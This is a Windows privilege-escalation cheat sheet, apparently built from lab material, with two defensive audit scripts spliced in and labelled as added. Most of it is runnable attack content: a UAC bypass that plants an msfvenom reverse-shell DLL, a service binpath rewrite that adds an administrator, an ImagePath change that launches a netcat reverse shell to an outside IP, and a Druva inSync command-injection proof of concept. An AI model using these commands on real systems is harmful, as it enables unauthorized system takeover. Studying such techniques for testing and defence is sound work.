Martian Defense NoteBook

OS Attacks

User Account Control (UAC)

Confirming UAC Enabled

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Checking UAC Level (When Enabled)

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
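As an added example (not from the notebook), the two registry values queried above decoded into a UAC posture summary, the way a hardening review would report them; the value meanings are the documented ones for the "Behavior of the elevation prompt for administrators" policy, and the function name is my own.

```powershell
# Added example, not from the notebook: read the two registry values the page
# queries and turn them into a UAC posture summary with hardening findings.
$UacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacPosture {
    $props = Get-ItemProperty -Path $UacKey -ErrorAction Stop

    # EnableLUA=0 turns UAC off; an absent value means the default (enabled).
    $enabled = if ($null -eq $props.EnableLUA) { $true } else { [bool]$props.EnableLUA }

    # Documented meanings of ConsentPromptBehaviorAdmin ("Behavior of the
    # elevation prompt for administrators in Admin Approval Mode").
    $behavior = @{
        0 = 'Elevate without prompting'
        1 = 'Prompt for credentials on the secure desktop'
        2 = 'Prompt for consent on the secure desktop'
        3 = 'Prompt for credentials'
        4 = 'Prompt for consent'
        5 = 'Prompt for consent for non-Windows binaries (default)'
    }
    $level = $props.ConsentPromptBehaviorAdmin
    $desc  = "Unknown value ($level)"
    if ($null -eq $level) { $desc = 'Not set (default behaviour, level 5)' }
    elseif ($behavior.ContainsKey([int]$level)) { $desc = $behavior[[int]$level] }

    # Findings a hardening review would raise: UAC off, or silent elevation.
    $findings = @()
    if (-not $enabled) { $findings += 'UAC disabled (EnableLUA=0)' }
    elseif ($level -eq 0) { $findings += 'Administrators elevate without any prompt (ConsentPromptBehaviorAdmin=0)' }

    [pscustomobject]@{
        UacEnabled                 = $enabled
        ConsentPromptBehaviorAdmin = $level
        Behaviour                  = $desc
        Findings                   = $findings
    }
}

Get-UacPosture | Format-List
```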

https://github.com/hfiref0x/UACME

Bypassing UAC (Method)

# Checking Path Variable
cmd /c echo %PATH%

# Generate Reverse Shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8443 -f dll > srrstr.dll

# Test Reverse Shell
rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll

# Execute UAC
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

Weak Permissions

Weak Permission Audit

https://github.com/GhostPack/SharpUp/

.\SharpUp.exe audit

Manual Permission Check

icacls <filepath>

1. Replace Service Binary Path (sc.exe requires a space after binpath=)

sc config WindscribeService binpath= "cmd /c net localgroup administrators htb-student /add"

2. Restart Service

sc start WindscribeService

Unquoted Service Path

Find Unquoted Service Paths

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Check Weak Service ACL (Accesschk.exe)

accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

Modify Image-Path

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
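The unquoted-path search and the service ACL check above, as one added audit script (not from the notebook) written from the defender's side: it lists services with an unquoted, space-containing ImagePath, reports which of the directories the service control manager would search first are writable by a low-privilege group, and prints the quoted path to set as the fix. Function names and the low-privilege group list are my own assumptions; run it from an elevated prompt so Get-Acl can read every directory.

```powershell
# Added example, not from the notebook: find services whose ImagePath is
# unquoted and contains spaces, and flag those where a low-privilege group can
# write into a directory the service control manager tries before the real one.
$LowPrivGroups = @('Everyone', 'BUILTIN\Users',
                   'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

function Get-HijackDirectory([string]$Exe) {
    # "C:\Program Files\Some App\svc.exe" makes the SCM try C:\Program.exe and
    # C:\Program Files\Some.exe first, so C:\ and C:\Program Files are the risk.
    $parts = $Exe -split ' '
    $dirs = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $dir = Split-Path -Parent ($parts[0..($i - 1)] -join ' ')
        if ($dir -and $dirs -notcontains $dir) { $dirs += $dir }
    }
    return $dirs
}

function Test-LowPrivWritable([string]$Dir) {
    if (-not (Test-Path -LiteralPath $Dir)) { return $false }
    $write = [System.Security.AccessControl.FileSystemRights]::Write
    foreach ($ace in (Get-Acl -LiteralPath $Dir).Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $LowPrivGroups -contains $ace.IdentityReference.Value -and
            $ace.PropagationFlags -notmatch 'InheritOnly' -and
            (($ace.FileSystemRights -band $write) -ne 0)) { return $true }
    }
    return $false
}

function Get-UnquotedServicePath {
    Get-CimInstance Win32_Service | Where-Object {
        $_.PathName -and $_.PathName -notmatch '^"' -and
        $_.PathName -notmatch '^[A-Za-z]:\\Windows\\'
    } | ForEach-Object {
        # Everything up to and including the first ".exe" is the executable.
        $exe = $_.PathName -replace '(?i)(\.exe).*$', '$1'
        if ($exe -match ' ') {
            [pscustomobject]@{
                Name          = $_.Name
                PathName      = $_.PathName
                WritableDirs  = @(Get-HijackDirectory $exe | Where-Object { Test-LowPrivWritable $_ })
                # Remediation: quoted form to apply with sc config <Name> binPath= "..."
                FixedPathName = '"' + $exe + '"' + $_.PathName.Substring($exe.Length)
            }
        }
    }
}
Get-UnquotedServicePath | Format-List
```

A service whose WritableDirs is non-empty is the condition the three commands above exploit; setting FixedPathName as the new ImagePath (and tightening the directory ACL) closes it.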

Vulnerable Services

Gather Installed Programs

wmic product get name

Gather Running Services

get-service | ? {$_.DisplayName -like 'Druva*'}

PoC

$ErrorActionPreference = "Stop"

$cmd = "net user htb-student /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

Last updated 5 months ago